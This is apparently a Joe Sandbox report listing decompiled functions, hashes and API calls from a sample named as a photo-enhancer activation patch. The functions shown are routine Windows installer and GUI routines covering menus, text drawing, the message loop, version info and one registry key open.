Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: 5252ed743ca1506dfec4bf7763c13d87116031bf2e865ad439b10f43f09a7791
Instruction ID: 7230bcb305953dbfdc536c8ede0a4f62da6dd01636a6d4693cd9d102c919f290
Opcode Fuzzy Hash: 5252ed743ca1506dfec4bf7763c13d87116031bf2e865ad439b10f43f09a7791
Instruction Fuzzy Hash: F7F0B430B04104AFEB04E6A6ED82BEB379DC715308F2095BBE505DB392D678ED05979E

Uniqueness

Uniqueness Score: -1.00%

Function 00484014 Relevance: 4.6, APIs: 3, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00484014(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v24;
				char _v28;
				void* _t25;
				signed int _t30;
				intOrPtr _t31;
				intOrPtr _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				char _t73;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HMENU__* _t88;
				void* _t90;
				void* _t91;
				intOrPtr _t92;

				_t87 = __esi;
				_t86 = __edi;
				_t73 = __edx;
				_t90 = _t91;
				_t92 = _t91 + 0xffffffe8;
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_t93 = __edx;
				if(__edx != 0) {
					_t92 = _t92 + 0xfffffff0;
					_t25 = E00402D30(_t25, _t90);
				}
				_v5 = _t73;
				_t67 = _t25;
				_push(_t90);
				_push(0x484171);
				_push( *[fs:eax]);
				 *[fs:eax] = _t92;
				E004985E8(0); // executed
				_t30 = E004988F0(_t25, _t93);
				if(( *0x49f31b & 0x00000020) == 0) {
					_t31 =  *0x49e62c; // 0x2252410
					 *((char*)(_t31 + 0x3a)) = 0;
				} else {
					if(( *0x49f31b & 0x00000040) != 0) {
						__eflags =  *0x49f31b & 0x00000080;
						if(( *0x49f31b & 0x00000080) == 0) {
							_t30 = E00421454(_t67, 1);
						}
					} else {
						_t30 = E00421454(_t67, 0);
					}
					E00498160(_t30 & 0xffffff00 |  *((char*)(_t67 + 0x111)) == 0x00000002,  &_v24);
					E00414B0C(_t67,  &_v24);
					E0041864C(_t67);
					if(( *0x49f31c & 0x00000001) != 0) {
						E004219E4(_t67, 2);
					}
				}
				if(( *0x49f320 & 0x00000008) == 0) {
					_t75 =  *0x49f474; // 0x2268ae0
					E00451C30(0xa2,  &_v28, _t75);
					E00414FA8(_t67, _t67, _v28, _t86, _t87);
				} else {
					_t79 =  *0x49f478; // 0x2268b28
					E00451C30(0xa2,  &_v28, _t79);
					E00414FA8(_t67, _t67, _v28, _t86, _t87);
				}
				_t88 = GetSystemMenu(E00418670(_t67), 0);
				AppendMenuA(_t88, 0x800, 0, 0);
				_t40 =  *0x49ec54; // 0x230b230
				AppendMenuA(_t88, 0, 0x270f, E00403738(_t40));
				_t43 =  *0x49e62c; // 0x2252410
				E00424964(_t43, _t86, _t88, 0x485d98, _t67);
				_t45 =  *0x49e62c; // 0x2252410
				if( *((char*)(_t45 + 0x3a)) != 0) {
					E00421050(_t67, 1);
				}
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(0x484178);
				return E00403400( &_v28);
			}

0x00484014
0x00484014
0x00484014
0x00484015
0x00484017
0x0048401b
0x0048401c
0x0048401f
0x00484022
0x00484024
0x00484026
0x00484029
0x00484029
0x0048402e
0x00484031
0x00484035
0x00484036
0x0048403b
0x0048403e
0x00484045
0x0048404c
0x00484058
0x004840b7
0x004840bc
0x0048405a
0x00484061
0x0048406e
0x00484075
0x0048407b
0x0048407b
0x00484063
0x00484067
0x00484067
0x0048408d
0x00484097
0x0048409e
0x004840aa
0x004840b0
0x004840b0
0x004840aa
0x004840c7
0x004840e8
0x004840f0
0x004840fa
0x004840c9
0x004840cc
0x004840d4
0x004840de
0x004840de
0x0048410e
0x0048411a
0x0048411f
0x00484132
0x0048413d
0x00484142
0x00484147
0x00484150
0x00484156
0x00484156
0x0048415d
0x00484160
0x00484163
0x00484170

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,00484171), ref: 00484109
AppendMenuA.USER32 ref: 0048411A
AppendMenuA.USER32 ref: 00484132

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu$Append$System
String ID:
API String ID: 1489644407-0
Opcode ID: dc8b36ddd18fed80e840ee8cbe9b889ef4cf18149991e537b86b896238235e1c
Instruction ID: ab56d251ed543ba42b2362adab02e381b7ffec43a0f0b9b6508873944b2238f1
Opcode Fuzzy Hash: dc8b36ddd18fed80e840ee8cbe9b889ef4cf18149991e537b86b896238235e1c
Instruction Fuzzy Hash: DD3104707043455AD711FB369C86BAF3A549BA2308F50493FF900AB3D3DA7C9849879D

Uniqueness

Uniqueness Score: -1.00%

Function 00452CE8 Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00452CE8(void* __eax, void* __edx) {
				void* _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				void* _t21;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t47;
				void* _t50;
				void* _t56;
				void* _t60;
				void* _t62;
				intOrPtr _t63;

				_t60 = _t62;
				_t63 = _t62 + 0xffffffe8;
				_v8 = __edx;
				_t56 = __eax;
				_v9 = 0;
				_push( &_v16);
				_t21 = E00403738(__eax);
				_t50 = _t21;
				_push(_t50); // executed
				L00405B6C(); // executed
				_t39 = _t21;
				if(_t39 <= 0) {
					if( *0x49c0dc != 1) {
						_v9 = E00452B0C(_t56, _v8);
					}
					return _v9;
				} else {
					_v20 = E00402648(_t39);
					_push(_t60);
					_push(0x452d83);
					_push( *[fs:eax]);
					 *[fs:eax] = _t63;
					_push(_v20);
					_push(_t39);
					_t29 = _v16;
					_push(_t29);
					_push(_t50); // executed
					L00405B64(); // executed
					if(_t29 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E00452DAC);
						_t35 = _v20;
						_push(_t35);
						L00405B74();
						if(_t35 != 0) {
							memcpy(_v8, _v24, 0xd << 2);
							_v9 = 1;
						}
					}
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(E00452DA0);
					return E00402660(_v20);
				}
			}

0x00452ce9
0x00452ceb
0x00452cf1
0x00452cf4
0x00452cf6
0x00452cfd
0x00452d00
0x00452d05
0x00452d07
0x00452d08
0x00452d0d
0x00452d11
0x00452d91
0x00452d9d
0x00452d9d
0x00452da9
0x00452d13
0x00452d1a
0x00452d1f
0x00452d20
0x00452d25
0x00452d28
0x00452d2e
0x00452d2f
0x00452d30
0x00452d33
0x00452d34
0x00452d35
0x00452d3c
0x00452d41
0x00452d45
0x00452d46
0x00452d4b
0x00452d4e
0x00452d4f
0x00452d56
0x00452d67
0x00452d69
0x00452d69
0x00452d56
0x00452d6f
0x00452d72
0x00452d75
0x00452d82
0x00452d82

APIs

739F14E0.VERSION(00000000,?,?,?,?), ref: 00452D08
739F14C0.VERSION(00000000,?,00000000,?,00000000,00452D83,?,00000000,?,?,?,?), ref: 00452D35
739F1500.VERSION(?,00452DAC,?,?,00000000,?,00000000,?,00000000,00452D83,?,00000000,?,?,?,?), ref: 00452D4F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: F1500
String ID:
API String ID: 2184832020-0
Opcode ID: 0b168feaf9c1533958fb5e02aa9a5501c5ad47ec3a54fa228dfedbb3323d7179
Instruction ID: ddd73f9b83f47df12750701182fb86573bb1adbd0e7288047a879799487d3de5
Opcode Fuzzy Hash: 0b168feaf9c1533958fb5e02aa9a5501c5ad47ec3a54fa228dfedbb3323d7179
Instruction Fuzzy Hash: EE216871A005086FD701DAA98D41DAFB7FCDB46711F554477FC04E3242D6799E08C769

Uniqueness

Uniqueness Score: -1.00%

Function 0044B8C0 Relevance: 4.6, APIs: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0044B8C0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				struct HDC__* _v16;
				char _v24;
				char _v32;
				void* _t48;
				intOrPtr _t59;
				void* _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t67;

				_t61 = __esi;
				_t60 = __edi;
				_t63 = _t64;
				_t65 = _t64 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t48 = __eax;
				_push(_t63);
				_push(0x44b9c1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t65;
				_t50 =  *((intOrPtr*)(__eax + 0x2c));
				E0040AED8(0,  *((intOrPtr*)(__eax + 0x2c)), 0,  &_v32, 0);
				if(_v24 > 0) {
					_t6 =  &_v24;
					 *_t6 = _v24 - 1;
					_t67 =  *_t6;
				}
				E00414F78(_t48,  &_v12, _t67);
				if(_v12 == 0 ||  *((char*)(_t48 + 0x106)) != 0 &&  *_v12 == 0x26 &&  *((char*)(_v12 + 1)) == 0) {
					E0040357C( &_v12, 0x44b9d8);
				}
				_v16 = GetDC(0);
				_push(_t63);
				_push(0x44b991);
				_push( *[fs:eax]);
				 *[fs:eax] = _t65;
				SelectObject(_v16, E0041A678( *((intOrPtr*)(_t48 + 0x44)), _t48, _t50, _t60, _t61));
				E0044B5F4(_v16,  &_v32, _v12, E0044B878(_t48) | 0x00000400); // executed
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(E0044B998);
				return ReleaseDC(0, _v16);
			}

0x0044b8c0
0x0044b8c0
0x0044b8c1
0x0044b8c3
0x0044b8c6
0x0044b8c7
0x0044b8c8
0x0044b8cb
0x0044b8ce
0x0044b8d1
0x0044b8d5
0x0044b8d6
0x0044b8db
0x0044b8de
0x0044b8e7
0x0044b8ee
0x0044b8f7
0x0044b8f9
0x0044b8f9
0x0044b8f9
0x0044b8f9
0x0044b901
0x0044b90a
0x0044b92e
0x0044b92e
0x0044b93a
0x0044b93f
0x0044b940
0x0044b945
0x0044b948
0x0044b958
0x0044b973
0x0044b97a
0x0044b97d
0x0044b980
0x0044b990

APIs

GetDC.USER32(00000000), ref: 0044B935
SelectObject.GDI32(?,00000000), ref: 0044B958
ReleaseDC.USER32 ref: 0044B98B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ObjectReleaseSelect
String ID:
API String ID: 1831053106-0
Opcode ID: e4822f2f27a90c0759968424fd043719417fa313c55766f7b6e2e713107b7c51
Instruction ID: 5f6416779418d586cf190573f7bf4a7bb4d400156242e88c08e8c7aea5cbb268
Opcode Fuzzy Hash: e4822f2f27a90c0759968424fd043719417fa313c55766f7b6e2e713107b7c51
Instruction Fuzzy Hash: C62177B0E04308AFEB11DFA5C881B9EBBB8EB49304F5184BAF500A7291D77CD940CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044B5F4 Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0044B5F4(struct HDC__* __eax, struct tagRECT* __ecx, void* __edx, int _a4) {
				struct tagRECT* _v8;
				short* _v12;
				int _t12;
				int _t30;
				intOrPtr _t41;
				struct HDC__* _t43;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff8;
				_v8 = __ecx;
				_t46 = __edx;
				_t43 = __eax;
				_t12 = E00403574(__edx);
				_t30 = _t12;
				if(_t30 == 0) {
					L5:
					return _t12;
				} else {
					if( *0x49c0dc != 2) {
						_t12 = DrawTextA(_t43, E00403738(__edx), _t30, _v8, _a4);
						goto L5;
					} else {
						if(_t30 > 0x3fffffff) {
							goto L5;
						} else {
							_v12 = E00402648(_t30 + _t30);
							_push(_t49);
							_push(0x44b680);
							_push( *[fs:edx]);
							 *[fs:edx] = _t52;
							DrawTextW(_t43, _v12, MultiByteToWideChar(0, 0, E00403738(_t46), _t30, _v12, _t30), _v8, _a4); // executed
							_pop(_t41);
							 *[fs:eax] = _t41;
							_push(E0044B69E);
							return E00402660(_v12);
						}
					}
				}
			}

0x0044b5f5
0x0044b5f7
0x0044b5fd
0x0044b600
0x0044b602
0x0044b606
0x0044b60b
0x0044b60f
0x0044b69e
0x0044b6a4
0x0044b615
0x0044b61c
0x0044b699
0x00000000
0x0044b61e
0x0044b624
0x00000000
0x0044b626
0x0044b62f
0x0044b634
0x0044b635
0x0044b63a
0x0044b63d
0x0044b665
0x0044b66c
0x0044b66f
0x0044b672
0x0044b67f
0x0044b67f
0x0044b624
0x0044b61c

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B680,?,004849A3,?,?), ref: 0044B652
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B665
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B699

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID:
API String ID: 65125430-0
Opcode ID: 63c04f90603744f798e42aba6243c37eae4be5ab149869f7acaebc15ddea55e3
Instruction ID: 1ea4d790d63f24178cbae964d575408221d26853f0f73c11de666758b6730ab2
Opcode Fuzzy Hash: 63c04f90603744f798e42aba6243c37eae4be5ab149869f7acaebc15ddea55e3
Instruction Fuzzy Hash: D111B6B27046047FE710DAAA9C82D6FB7ECDB49724F10457AF504E7290DA399E018A69

Uniqueness

Uniqueness Score: -1.00%

Function 0042488C Relevance: 4.6, APIs: 3, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042488C(void* __eax) {
				struct tagMSG _v36;
				int _t16;
				int _t32;
				void* _t39;
				char* _t40;

				_t40 =  &(_v36.message);
				_t39 = __eax;
				_t32 = 0;
				_t16 = PeekMessageA( &_v36, 0, 0, 0, 1); // executed
				if(_t16 != 0) {
					_t32 = 1;
					if(_v36.message == 0x12) {
						 *((char*)(_t39 + 0x7c)) = 1;
					} else {
						 *_t40 = 0;
						if( *((short*)(_t39 + 0x96)) != 0) {
							 *((intOrPtr*)(_t39 + 0x94))();
						}
						if(E0042485C(_t39,  &_v36) == 0 &&  *_t40 == 0 && E004247A8(_t39,  &_v36) == 0 && E004247F8(_t39,  &_v36) == 0 && E00424784(_t39,  &_v36) == 0) {
							TranslateMessage( &_v36);
							DispatchMessageA( &_v36); // executed
						}
					}
				}
				return _t32;
			}

0x0042488e
0x00424891
0x00424893
0x004248a2
0x004248a9
0x004248af
0x004248b6
0x00424930
0x004248b8
0x004248b8
0x004248c4
0x004248d2
0x004248d2
0x004248e5
0x0042491f
0x00424929
0x00424929
0x004248e5
0x004248b6
0x0042493b

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004248A2
TranslateMessage.USER32(?), ref: 0042491F
DispatchMessageA.USER32 ref: 00424929

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 217a056534c9592df3de3b745a25b010ee0154ab168cb63c5ecf066f178eda2d
Instruction ID: 2fd165f6649a427b3319829ae0df7e0e74220d275175f78bf4976128ec8e280a
Opcode Fuzzy Hash: 217a056534c9592df3de3b745a25b010ee0154ab168cb63c5ecf066f178eda2d
Instruction Fuzzy Hash: 9711C4703053605ADA20E634A9417ABB7C4CFC3704F82481EF9D987392D37D9D89879A

Uniqueness

Uniqueness Score: -1.00%

Function 00416AD4 Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416AD4(void* __eax) {
				int _t7;
				void* _t19;
				void* _t22;
				intOrPtr _t23;

				_t7 = __eax;
				_t19 = __eax;
				if( *(__eax + 0xc0) == 0) {
					 *((intOrPtr*)( *__eax + 0x64))();
					_t22 = __eax;
					SetPropA( *(__eax + 0xc0),  *0x49e5cc & 0x0000ffff, __eax);
					_t7 = SetPropA( *(_t19 + 0xc0),  *0x49e5ca & 0x0000ffff, _t22);
					_t23 =  *((intOrPtr*)(_t19 + 0x20));
					_t25 = _t23;
					if(_t23 != 0) {
						return SetWindowPos( *(_t19 + 0xc0), E00416A8C(_t23, _t19, _t25), 0, 0, 0, 0, 0x13);
					}
				}
				return _t7;
			}

0x00416ad4
0x00416ad6
0x00416adf
0x00416ae5
0x00416ae8
0x00416afa
0x00416b0f
0x00416b14
0x00416b17
0x00416b19
0x00000000
0x00416b36
0x00416b19
0x00416b3d

APIs

SetPropA.USER32(00000000,00000000), ref: 00416AFA
SetPropA.USER32(00000000,00000000), ref: 00416B0F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416B36

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: d713cafafaca0930c04d6cb39f3c322ae331ae37b9587890123c67b5c3bff97d
Instruction ID: f49ac21c72ec4198518a05967b53ec16f1ca927682628d76ec8ffae5e4f9a687
Opcode Fuzzy Hash: d713cafafaca0930c04d6cb39f3c322ae331ae37b9587890123c67b5c3bff97d
Instruction Fuzzy Hash: 75F0B271741220AFD710AB9A8C85FA633DCAB19715F160176BD09EF286C678DC41C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2E4 Relevance: 4.5, APIs: 3, Instructions: 27
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F2E4(void* __edx, struct HWND__* _a4) {
				intOrPtr* _t7;
				struct HWND__* _t9;
				intOrPtr _t11;
				void* _t12;

				_t9 = _a4;
				_t12 = _t9 -  *0x49c580; // 0x0
				if(_t12 != 0 && IsWindowVisible(_t9) != 0 && IsWindowEnabled(_t9) != 0) {
					_t7 = E00402648(8);
					_t11 =  *0x49c58c; // 0x0
					 *_t7 = _t11;
					 *(_t7 + 4) = _t9;
					 *0x49c58c = _t7;
					EnableWindow(_t9, 0); // executed
				}
				return 1;
			}

0x0041f2e8
0x0041f2eb
0x0041f2f1
0x0041f30c
0x0041f311
0x0041f317
0x0041f319
0x0041f31c
0x0041f324
0x0041f324
0x0041f32f

APIs

IsWindowVisible.USER32(?), ref: 0041F2F4
IsWindowEnabled.USER32(?), ref: 0041F2FE
EnableWindow.USER32(?,00000000), ref: 0041F324

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: 75da7560ddbcbd352d2b263d7a30c73b5df1f70394dc16e5d6cfb5f5cdd4f04a
Instruction ID: 461c9e3a5a3bf819d65056d8b2c697f5f692a305fcbbe48695acf38c0ff2848d
Opcode Fuzzy Hash: 75da7560ddbcbd352d2b263d7a30c73b5df1f70394dc16e5d6cfb5f5cdd4f04a
Instruction Fuzzy Hash: E1E0EDB4101204AAE710AB76DCC1A56779CFB54354F818437AC159B293DA3DE8459A78

Uniqueness

Uniqueness Score: -1.00%

Function 00484988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00484988(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				void* _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t26;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr _t40;

				_t44 = __fp0;
				_push(_t24);
				_push(_t37);
				_push(_t35);
				_t26 =  *0x49e62c; // 0x2252410
				_t6 = E004688B8(_t24, _t26, 1, _t35, _t37, __fp0); // executed
				 *0x49f0ac = _t6;
				_t42 =  *0x49f490;
				if( *0x49f490 != 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_v12 = 0;
					_v8 = 0xb;
					_t21 =  *0x49f490; // 0x23113e0, executed
					E00497B58(_t21,  &_v12, "InitializeWizard", _t42, __fp0, 0, 0); // executed
					_pop(_t34);
					_t26 = 0x4849e8;
					 *[fs:eax] = _t34;
				}
				_t7 =  *0x49f0ac; // 0x31f4d88
				E004988C8(_t7);
				_t9 =  *0x49f0ac; // 0x31f4d88
				E0046C4D8(_t9, _t24, 1, _t35, _t37, _t44);
				if( *0x49f443 != 0) {
					_t11 =  *0x49f0ac; // 0x31f4d88
					_t12 = E0046E1B8(_t11);
				} else {
					_t13 =  *0x49f0ac; // 0x31f4d88
					E0046E180(_t13, _t26, _t35, _t44);
					_t15 =  *0x49e62c; // 0x2252410
					SetActiveWindow( *(_t15 + 0x20));
					_t18 =  *0x49f0ac; // 0x31f4d88
					_t12 = E00423294(_t18);
				}
				return _t12;
			}

0x00484988
0x0048498e
0x0048498f
0x00484990
0x00484991
0x0048499e
0x004849a3
0x004849a8
0x004849af
0x004849b9
0x004849bc
0x004849c5
0x004849c8
0x004849d4
0x004849d9
0x004849e0
0x004849e2
0x004849e3
0x004849e3
0x00484a01
0x00484a06
0x00484a10
0x00484a15
0x00484a21
0x00484a47
0x00484a4c
0x00484a23
0x00484a23
0x00484a28
0x00484a2d
0x00484a36
0x00484a3b
0x00484a40
0x00484a40
0x00484a57

APIs

SetActiveWindow.USER32(?), ref: 00484A36

Strings

InitializeWizard, xrefs: 004849CF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: 6eba38f9a554e17657ffdaa486dd11f811a9fa08eadb4d57ce03b5ac28d5857a
Instruction ID: 9663d0bfca85fd8d9c68d73251753a4714549ba788b257aa0fdf1999294ad1b6
Opcode Fuzzy Hash: 6eba38f9a554e17657ffdaa486dd11f811a9fa08eadb4d57ce03b5ac28d5857a
Instruction Fuzzy Hash: D9116D30644144DFD304FB2AFC46A5A77E8E765718F61843BE404CB7A2EA39EC048B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047E730 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047E730(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				long _t13;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E0042E2AC(__eax, "Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E00403400(_t24);
				}
				if(E0042E1DC() == 0) {
					E00403400(_t24);
				}
				_t13 = RegCloseKey(_v8); // executed
				return _t13;
			}

0x0047e737
0x0047e751
0x0047e758
0x00000000
0x0047e77e
0x0047e768
0x0047e76c
0x0047e76c
0x0047e775
0x00000000

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047E97C,00000000,0047EB7C), ref: 0047E775

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0047E745

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

